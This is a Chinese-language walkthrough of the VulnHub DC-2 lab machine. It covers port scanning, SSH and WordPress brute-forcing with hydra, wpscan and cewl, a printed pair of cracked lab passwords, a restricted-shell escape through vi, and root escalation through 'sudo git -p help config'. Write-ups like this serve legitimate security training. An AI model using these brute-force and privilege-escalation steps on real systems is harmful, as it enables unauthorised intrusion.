vulnhub-dc-2

vulnhub第三个靶机

靶机地址:链接: https://www.vulnhub.com/entry/dc-2,311/.

知识点

nmap

使用nmap扫描局域网内存活的主机,发现靶机ip

nmap 192.168.88.0/24 -T4


用nmap对其进行更详细的探测,发现开放了)

端口 服务
80 http
7744 ssh


端口:7744——>爆破——>失败

hydra -l root -P rockyou.txt 192.168.88.138 ssh -t 4 -s 7744

wordpress

端口:80——>web漏洞——>成功

访问80端口发现不能连接到该网站,需要设置一下hosts文件,便可访问


在右下方发现第一个flag,并且需要用到工具 cewl.(kali自带)


指纹识别为wordpress,该CMS为一款比较知名的博客CMS。对于该CMS,kali有自带的扫描工具wpscan.

whatweb http://dc-2


枚举用户,发现三个用户admin、jerry、tom

wpscan --url http://dc-2 -e u


编写帐号文件

用cewl生成密码字典

cewl http://dc-2/ -w dc2.txt


wpscan爆破wordpress后台,成功得到两对帐号密码

Username: jerry, Password: adipiscing
Username: tom, Password: parturient

wpscan --url http://dc-2 -U dc2user.txt -P dc2.txt 

wordpress的默认后台地址:url+wp-login.php

用tom用户登录没发现可利用的地方,但用jerry用户登录发现了第二个flag,要寻找另一个切入点。

rbash绕过

试着用得到帐号密码登录主机,发现jerry用户没权限登录,但是tom可以登录


在tom的家目录发现了第三个flag,但是因为shell不完整查看不了。这时候需要绕过 rbash.

经过多次试验,发现vi命令可以用,也读取到了第三个flag

vi 1
:set shell =/bin/sh(执行完第一个再执行第二个)
:shell
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin (设置环境变量)


根据提示查看主机的用户,发现也存在jerry这个用户,试着用前面的密码登录,发现登录成功

su jerry

sudo提权之git

在jerry用户的家目录下发现第四个flag,根据提示应该是要git提权


发现jerry用户可以不用密码执行git命令,百度了下git 提权.,git -p 分页显示命令手册,会调用more这个命令,more这个命令是可以执行sh的

sudo -l  
sudo git -p help config
!/bin/sh 


至此5个lag全部拿到


  转载请注明: XingHe vulnhub-dc-2

  目录